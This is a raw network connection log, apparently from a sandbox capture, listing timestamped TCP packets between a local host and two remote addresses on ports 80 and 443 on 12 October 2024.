Oct 12, 2024 20:07:55.414257050 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.414398909 CEST	49964	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.417716980 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.419969082 CEST	80	49964	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:55.422612906 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:55.423331022 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.423439026 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.423453093 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:55.428386927 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:55.428638935 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.903420925 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.903554916 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.903613091 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.903645992 CEST	49972	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.905852079 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.908566952 CEST	80	49972	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.910773993 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.910845041 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.910952091 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.910976887 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:56.915836096 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:56.916021109 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.598740101 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.598787069 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.598871946 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.598972082 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.599797010 CEST	49983	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.602504969 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.604635000 CEST	80	49983	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.607451916 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.610280037 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.610378981 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.610402107 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:07:58.618027925 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:07:58.618057013 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.089637995 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.089792013 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.089879990 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.089879990 CEST	49993	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.092329979 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.094861031 CEST	80	49993	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.097347975 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.097444057 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.097592115 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.097647905 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:00.102510929 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:00.102543116 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.634527922 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.634624004 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.634818077 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.665533066 CEST	49998	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.671596050 CEST	80	49998	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.765675068 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.770747900 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.770827055 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.771761894 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.771790028 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:01.776616096 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:01.776768923 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.280970097 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.281069994 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.281167984 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.281323910 CEST	49999	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.283809900 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.286107063 CEST	80	49999	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.288744926 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.288834095 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.293900013 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.293936014 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:03.298789024 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:03.298892021 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:04.804044962 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:04.804840088 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:04.804920912 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:04.805011034 CEST	50000	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:04.807180882 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:04.807272911 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:04.807414055 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:04.807898045 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:04.807936907 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:04.809922934 CEST	80	50000	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:05.426835060 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:05.426939011 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:05.428956985 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:05.429012060 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:05.429435968 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:05.437896967 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:05.483407974 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.616775990 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.616842031 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.616977930 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.617043018 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.622133017 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.622239113 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.622257948 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.622472048 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.622565985 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.622579098 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.624172926 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.624260902 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.624294996 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.625029087 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.625108957 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.625122070 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.627831936 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.627927065 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.627939939 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.628914118 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.629034042 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.629048109 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.632078886 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.632169962 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.632183075 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.632850885 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.632932901 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.632945061 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.633457899 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.633536100 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.633548021 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.634052038 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.634131908 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.634144068 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.634490013 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.634566069 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.634577036 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.635035038 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.635113001 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.635123968 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.637525082 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.637603998 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.637615919 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.637645960 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.637726068 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.637737036 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.638093948 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.638169050 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.638180017 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.638259888 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.638333082 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.638344049 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.639022112 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.639111042 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.639127016 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.639166117 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.639214039 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.639239073 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.640044928 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.640146971 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.640208006 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.640290022 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.640300989 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.640396118 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.640458107 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.640499115 CEST	50001	443	192.168.2.5	23.145.40.164
Oct 12, 2024 20:08:06.640527964 CEST	443	50001	23.145.40.164	192.168.2.5
Oct 12, 2024 20:08:06.661393881 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:06.666320086 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:06.666403055 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:06.666564941 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:06.666588068 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:06.671478987 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:06.671494961 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.140535116 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.140613079 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.140703917 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.140955925 CEST	50002	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.143580914 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.147577047 CEST	80	50002	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.149363995 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.149441004 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.149559021 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.149594069 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:08.155446053 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:08.155453920 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.781217098 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.781232119 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.781234980 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.781553030 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.781666994 CEST	50003	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.785038948 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.786573887 CEST	80	50003	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.790123940 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.790216923 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.790385008 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.790419102 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:09.795181990 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:09.795357943 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.264607906 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.264705896 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.264790058 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.265103102 CEST	50004	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.268346071 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.270302057 CEST	80	50004	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.274672985 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.274806023 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.274945021 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.274966955 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:11.281177044 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:11.281214952 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.806922913 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.807482958 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.807847023 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.807847023 CEST	50005	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.811254978 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.813213110 CEST	80	50005	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.816379070 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.816540003 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.816751003 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.816786051 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:12.821635962 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:12.821752071 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.107202053 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.107248068 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.107276917 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.107314110 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.107332945 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.107332945 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.107453108 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.107614040 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.108445883 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.108505011 CEST	50006	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.111119032 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.113223076 CEST	80	50006	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.116086960 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.116169930 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.116512060 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.116561890 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:15.121419907 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:15.121510029 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.638910055 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.639003038 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.639262915 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.639586926 CEST	50007	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.642072916 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.644808054 CEST	80	50007	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.647351027 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.647474051 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.650084019 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.650121927 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:16.655230999 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:16.655271053 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.120666981 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.120716095 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.120800018 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.120954990 CEST	50008	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.126095057 CEST	80	50008	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.135024071 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.140064955 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.140151978 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.140367031 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.140367031 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:18.145693064 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:18.145724058 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.640125990 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.640150070 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.640221119 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.640378952 CEST	50009	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.643846035 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.645279884 CEST	80	50009	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.648659945 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.648749113 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.650695086 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.650719881 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:19.655569077 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:19.655596018 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.135768890 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.135833025 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.135938883 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.136056900 CEST	50010	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.139151096 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.140896082 CEST	80	50010	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.144131899 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.144331932 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.144534111 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.144654989 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:21.149337053 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:21.149452925 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.612827063 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.612874985 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.613112926 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.613535881 CEST	50011	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.618426085 CEST	80	50011	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.619102955 CEST	50012	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.624028921 CEST	80	50012	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.624248028 CEST	50012	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.624696970 CEST	50012	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.624831915 CEST	50012	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:22.629547119 CEST	80	50012	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:22.629637003 CEST	80	50012	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:23.941824913 CEST	50012	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:23.954070091 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:23.959233999 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:23.959373951 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:23.959450006 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:23.959471941 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:23.964519978 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:23.964550018 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:25.476564884 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:25.476701975 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:08:25.476954937 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:25.478574991 CEST	50013	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:08:25.483500957 CEST	80	50013	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:32.645432949 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:32.650964975 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:32.651062012 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:32.651304007 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:32.651304007 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:32.656173944 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:32.656270027 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:34.491059065 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:34.491348028 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:34.491364956 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:34.491380930 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:34.491548061 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:34.491548061 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:34.491548061 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:34.492841959 CEST	50014	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:34.497596979 CEST	80	50014	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:38.294967890 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:38.300112009 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:38.300205946 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:38.300371885 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:38.300395012 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:38.305162907 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:38.305314064 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:39.836384058 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:39.836433887 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:39.836652040 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:39.836746931 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.144743919 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.754304886 CEST	50015	80	192.168.2.5	119.204.11.2
Oct 12, 2024 20:09:40.892271996 CEST	80	50015	119.204.11.2	192.168.2.5
Oct 12, 2024 20:09:40.892357111 CEST	50015	80	192.168.2.5	119.204.11.2
